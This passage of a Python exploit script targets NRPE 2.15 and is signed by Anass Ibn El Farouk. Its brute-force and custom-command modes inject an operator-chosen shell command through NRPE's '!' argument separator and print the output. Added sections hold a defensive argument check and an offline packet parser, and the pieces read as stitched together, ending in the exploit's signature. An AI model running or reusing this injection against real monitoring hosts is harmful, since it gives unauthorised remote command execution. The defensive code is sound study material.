             0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
             0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
             0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
             0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
             0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
             0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
             0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
             0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
             0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
             0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
             0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
             0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
             0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
             0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
             0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
             0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
             0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
             0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
             0x2d02ef8d)

    def __str__(self):
        # Turn whatever string data we have into a null terminated string
        if len(self.sData) < MAX_PACKETBUFFER_LENGTH:
            sData = self.sData + "\0" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))
            sData += "SR" # not sure about this, from perl
        elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:
            sData = self.sData
        else:
            raise ValueError("CHECK_NRPE: invalid input")
        # Return a string that equals the C struct, not something printable
        return struct.pack("!hhLh" + str(len(sData)) + "s", self.nPacketVersion,
            self.nPacketType, self.nCRC32, self.nResultCode, sData)

    def __len__(self):
        return len(self.__str__())

    def dumpself(self):
        """Debugging output for self as C structure.

        Not normally used."""
        sElf = self.__str__()
        sPrev = sElf[0:1]
        nCount = 0
        ii = -1
        for sChar in sElf[1:]:
            ii += 1
            if sChar == sPrev:
                nCount += 1
                continue
            if nCount:
                print "%d\t%d *" % (ii - nCount, nCount + 1),
                nCount = 0
            else:
                print "%d\t" % ii,
            print "\t'%s' (%d)" % (sPrev, ord(sPrev))
            sPrev = sChar
        print "%d\t\t'%s' (%d)" % (ii + 1, sPrev, ord(sPrev))

    def calculate_crc32(self):
        """Calculate the CRC32 value for the string version of self."""
        nCRC = 0xFFFFFFFF
        for ii in self.__str__():
            nIndex = (nCRC ^ ord(ii)) & 0xFF
            nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]
        self.nCRC32 = nCRC ^ 0xFFFFFFFF
        #debug("DataPacket.calculate_crc32 = %d" % self.nCRC32)

    def extract(self, sQuery):
        """Turn a string into the DataPacket attributes."""
        #debug("DataPacket.extract(%d)" % len(sQuery))
        tVals = struct.unpack("!hhLh" + str(len(sQuery) - 10) + "s", sQuery)
        self.nPacketVersion = tVals[0]
        self.nPacketType = tVals[1]
        self.nCRC32 = tVals[2]
        self.nResultCode = tVals[3]
        self.sData = tVals[4]

m_nTimeout = 0
def alarm_handler(nSignum, oFrame):
    """Timeout catcher"""
    raise KeyboardInterrupt("CHECK_NRPE: Socket timeout after %d seconds." %
        m_nTimeout)


class NrpeClient(DataPacket):
    """Everything needed to send a message to an NRPE server and get data back.
    """
    def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,
                 packet_version=NRPE_PACKET_VERSION_2):
        DataPacket.__init__(self, packet_version, QUERY_PACKET)
        self.sServer = server_name
        self.nPort = server_port
        self.bUseSSL = use_ssl
        self.nTimeout = timeout

    def run_query(self, sQuery):
        """Connect to the NRPE server, send the query and get back data.
        """
        # initialize alarm signal handling and set timeout
        signal.signal(signal.SIGALRM, alarm_handler)
        signal.alarm(self.nTimeout)

        # try to connect to the host at the given port number
        oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # do SSL handshake
        if self.bUseSSL:
            oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
            oContext.set_cipher_list('ADH')
            oConnection = OpenSSL.SSL.Connection(oContext, oSocket)
        else:
            oConnection = oSocket

        oConnection.connect((self.sServer, self.nPort))

        # we're connected and ready to go
        self.sData = sQuery
        self.nCRC32 = 0
        self.calculate_crc32()

        # send the packet
        oConnection.send(str(self))

        # wait for the response packet
        sRval = oConnection.recv(len(self))

        # close the connection
        if self.bUseSSL and not oConnection.shutdown():
            try:
                sRval += oConnection.recv(len(self))
            except OpenSSL.SSL.ZeroReturnError:
                pass
        oSocket.close()
        del oSocket, oConnection
        if self.bUseSSL:
            del oContext

        # reset timeout
        signal.alarm(0)

        if len(sRval) == 0:
            raise IOError("CHECK_NRPE: Received 0 bytes from daemon." +
                "Check the remote server logs for error messages.")
        elif len(sRval) < len(self):
            raise IOError("CHECK_NRPE: Receive underflow - only " +
                "%d bytes received (%d expected)." % (len(sRval), len(self)))

        # Become the received data
        self.extract(sRval)

        # check the crc 32 value
        nRvalCRC = self.nCRC32
        self.nCRC32 = 0
        self.calculate_crc32()
        if nRvalCRC != self.nCRC32:
            raise ValueError("CHECK_NRPE: Response packet had invalid CRC32.")

        # check packet version
        if self.nPacketVersion != NRPE_PACKET_VERSION_2:
            raise ValueError("CHECK_NRPE: Invalid packet version received from server.")

        # check packet type
        if self.nPacketType != RESPONSE_PACKET:
            raise ValueError("CHECK_NRPE: Invalid packet type received from server.")

        # Turn the input data into a proper python string (chop at first NULL)
        for ii in range(len(self.sData)):
            if self.sData[ii] == "\0":
                break
        self.sData = self.sData[0:ii]
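

# ---------------------------------------------------------------------------
# Added example, not part of the original exploit or of NRPE: the argument
# check that closes the hole this script relies on. NASTY_METACHARS is the
# set the comment beside evilchar quotes ("|`&><'\"\\[]{};" plus "$()");
# NRPE 2.15 lets a newline through it, so a newline splits the argument into
# a second shell command. A correct check also rejects every control
# character. split_nrpe_query() is a hypothetical server-side helper, not an
# NRPE function; it keeps to Python 2 and 3 so it runs alongside this script.
# ---------------------------------------------------------------------------
NASTY_METACHARS = "|`&><'\"\\[]{};$()"


def is_safe_nrpe_arg(arg):
    """True only if arg has no shell metacharacter and no control character."""
    for ch in arg:
        if ch in NASTY_METACHARS:
            return False
        if ord(ch) < 0x20 or ord(ch) == 0x7F:
            return False
    return True


def split_nrpe_query(query):
    """Split "command!arg1!arg2" into (command, [args]); return None when any
    argument fails is_safe_nrpe_arg instead of handing it to a shell."""
    parts = query.split("!")
    command, args = parts[0], parts[1:]
    if not all(is_safe_nrpe_arg(a) for a in args):
        return None
    return command, args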


if __name__ == '__main__':
    m_oOpts = optparse.OptionParser("%prog -H Host_or_IP -c nrpe_command --cmd=\"command to execute\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]")
    m_oOpts.add_option('--host', '-H', action='store', type='string',
        help='The address of the host running the NRPE daemon (required)')
    m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,
        help='Do not use SSL')
    m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,
        help='The port on which the daemon is running (default=5666)')
    m_oOpts.add_option('--timeout', '-t', action='store', type='int',
        default=10,
        help='Number of seconds before connection times out (default=10)')
    m_oOpts.add_option('--command', '-c', action='store', type='string',
        #default='get_data',
        help='The name of nrpe command')
    m_oOpts.add_option('--brute', '-b', action='store_true', default=False,
        help='Find an existing nrpe command by trying every name from the list [ --list ]')
    m_oOpts.add_option('--list', action='store_true',  default=False,
        help='Show NRPE Command list')
    m_oOpts.add_option('--cmd', action='store', type='string',
        help='Command to execute on the remote server')

    m_oOptions, m_lArgs = m_oOpts.parse_args()
    m_nTimeout = m_oOptions.timeout
    m_sQuery = m_oOptions.command
    m_gList = m_oOptions.list
    m_sBrute = m_oOptions.brute

    print (banner)

    if m_gList:
        print('[+] NRPE Command list\n')
        for LinesPluginList in PluginList:
            print(LinesPluginList)
        sys.exit(0)
    elif m_sQuery and m_sBrute:
        print(m_oOpts.format_help())
        print('[!]')
        print('[!] ERROR: Select only -c OR -b option\n')
        sys.exit(1)
    elif not m_oOptions.host or not m_oOptions.cmd or not (m_sQuery or m_sBrute):
        # Host, --cmd and one of -c / -b are all required
        print(m_oOpts.format_help())
        sys.exit(1)

    print('[+] Target: '+m_oOptions.host)
    print('[+] Command: '+m_oOptions.cmd+' \n')

    if m_sBrute:
        print('[+] Brute force Mode....')
        print('[+]')
        for LinesPluginList in PluginList:

            m_CommandQuery = ""
            m_CommandQuery += ' ' + m_oOptions.cmd
            if m_lArgs:
                m_CommandQuery += ' ' + ' '.join(m_lArgs)

            # NRPE command name, '!' argument separator, the injection character,
            # the shell command to run, then ' #' so the shell ignores whatever
            # follows the injected argument in the configured command line
            m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'

            m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                m_oOptions.timeout)
            try:
                m_oNRPE.run_query(m_sQuery)
            except socket.error:
                print('[!] Connection Error!')
                sys.exit(1)
            except OpenSSL.SSL.ZeroReturnError:
                print('[!] Not Vulnerable')
                print('[!] Option dont_blame_nrpe disabled or service fixed')
                sys.exit(1)

            # The daemon answers "NRPE: Command '<name>' not defined" for a
            # name that is not in nrpe.cfg; anything else means the command
            # exists and our arguments reached it
            if m_oNRPE.sData.endswith("not defined"):
                print('[-] Checking for NRPE command '+LinesPluginList+':\t\t\tnot found')
            else:
                print('[+] Checking for NRPE command '+LinesPluginList+':\t\t\tVULNERABLE!')
                print('[+]')
                print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                print('[+]')
                print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                print('[+]')
                print(m_oNRPE.sData)
                sys.exit(0)
        print('[-] None of the listed NRPE commands is defined on the target')
        sys.exit(1)
    elif m_sQuery:
        print('[+] Custom command Mode....')
        print('[+]')
        print('[+] Connecting......')

        m_CommandQuery = ""
        m_CommandQuery += ' ' + m_oOptions.cmd
        if m_lArgs:
            m_CommandQuery += ' ' + ' '.join(m_lArgs)

        m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'

        m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
            m_oOptions.timeout)
        try:
            m_oNRPE.run_query(m_sQuery)
        except KeyboardInterrupt:
            print('[!] Interrupted.')
            sys.exit(1)
        except socket.timeout:
            # socket.timeout is a subclass of socket.error, so it must be caught first
            print("[!] CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout)
            sys.exit(1)
        except socket.error:
            print('[!] Connection Error!')
            sys.exit(1)
        except OpenSSL.SSL.ZeroReturnError:
            print('[!] Not Vulnerable')
            print('[!] Option dont_blame_nrpe disabled or service fixed')
            sys.exit(1)

        if m_oNRPE.sData.endswith("not defined"):
            print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')
            sys.exit(1)
        else:
            print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')
            print('[+]')
            print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
            print('[+]')
            print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
            print('[+]')
            print(m_oNRPE.sData)
            sys.exit(0)
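The recv() method above validates a response by length, CRC32, packet version and packet type and then cuts the buffer at the first NUL. The following is an added example, written for this page in Python 3 and not part of the original script, that builds and parses NRPE v2 packets stand-alone so those checks can be exercised offline: the 1036-byte wire layout, the CRC32 computed with the crc32_value field zeroed, the version/type checks, and the "not defined" reply the daemon gives for a command name absent from nrpe.cfg. The sample reply text and the check_users query are constructed here; no network access is needed.

```python
# Added example (not the original script's code): minimal NRPE v2 packet
# encoder/decoder applying the same checks as the recv() method above.
import struct
import zlib

NRPE_PACKET_VERSION_2 = 2
QUERY_PACKET = 1
RESPONSE_PACKET = 2
MAX_PACKETBUFFER_LENGTH = 1024

# Big-endian: int16 version, int16 type, uint32 crc32, int16 result code,
# 1024-byte buffer, 2 bytes of struct padding -> 1036 bytes on the wire.
PACKET_FORMAT = "!hhIh%dsh" % MAX_PACKETBUFFER_LENGTH
PACKET_SIZE = struct.calcsize(PACKET_FORMAT)   # 1036


def build_packet(packet_type, text, result_code=0):
    """Serialise one NRPE v2 packet carrying `text` in the buffer."""
    if isinstance(text, str):
        text = text.encode("utf-8")
    if len(text) >= MAX_PACKETBUFFER_LENGTH:
        raise ValueError("buffer must leave room for the terminating NUL")
    buf = text.ljust(MAX_PACKETBUFFER_LENGTH, b"\0")
    # The CRC32 covers the whole packet with crc32_value set to zero and is
    # then written into that field. NRPE's table-driven CRC equals zlib's.
    raw = struct.pack(PACKET_FORMAT, NRPE_PACKET_VERSION_2, packet_type,
                      0, result_code, buf, 0)
    crc = zlib.crc32(raw) & 0xFFFFFFFF
    return struct.pack(PACKET_FORMAT, NRPE_PACKET_VERSION_2, packet_type,
                       crc, result_code, buf, 0)


def parse_packet(raw, expected_type=RESPONSE_PACKET):
    """Validate a received packet; return (result_code, text) or raise."""
    if len(raw) < PACKET_SIZE:
        raise IOError("receive underflow: %d bytes received (%d expected)"
                      % (len(raw), PACKET_SIZE))
    raw = raw[:PACKET_SIZE]
    version, packet_type, crc, result_code, buf, _pad = struct.unpack(
        PACKET_FORMAT, raw)
    # Recompute the CRC with the crc32_value field (bytes 4..8) zeroed.
    zeroed = raw[:4] + b"\0\0\0\0" + raw[8:]
    if zlib.crc32(zeroed) & 0xFFFFFFFF != crc:
        raise ValueError("packet had invalid CRC32")
    if version != NRPE_PACKET_VERSION_2:
        raise ValueError("unexpected packet version %d" % version)
    if packet_type != expected_type:
        raise ValueError("unexpected packet type %d" % packet_type)
    # A real daemon fills the bytes after the terminator with random data,
    # so only the text up to the first NUL is meaningful.
    text = buf.split(b"\0", 1)[0].decode("utf-8", "replace")
    return result_code, text


def is_valid_packet(raw, expected_type=RESPONSE_PACKET):
    """True if parse_packet() accepts `raw`, False on any validation error."""
    try:
        parse_packet(raw, expected_type)
    except (IOError, ValueError):
        return False
    return True


def command_not_defined(text):
    """True when the daemon rejected the command name (not in nrpe.cfg)."""
    return text.endswith("not defined")


if __name__ == "__main__":
    # Constructed sample: the reply NRPE gives for a command absent from
    # nrpe.cfg (result code 3 = UNKNOWN).
    reply = build_packet(RESPONSE_PACKET,
                         "NRPE: Command 'check_foo' not defined", result_code=3)
    print(len(reply), parse_packet(reply), command_not_defined(parse_packet(reply)[1]))
    # Flip one byte inside the buffer: the CRC check rejects the packet.
    tampered = reply[:20] + bytes([reply[20] ^ 1]) + reply[21:]
    print(is_valid_packet(tampered))
```

The decoder deliberately checks the CRC before the version and type fields, in the same order as recv() above, so a truncated or corrupted packet is rejected before any field is trusted; cutting at the first NUL rather than at a fixed length is what keeps the daemon's random padding out of the reply text.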
 

xDay Exploit By : Anass Ibn El Farouk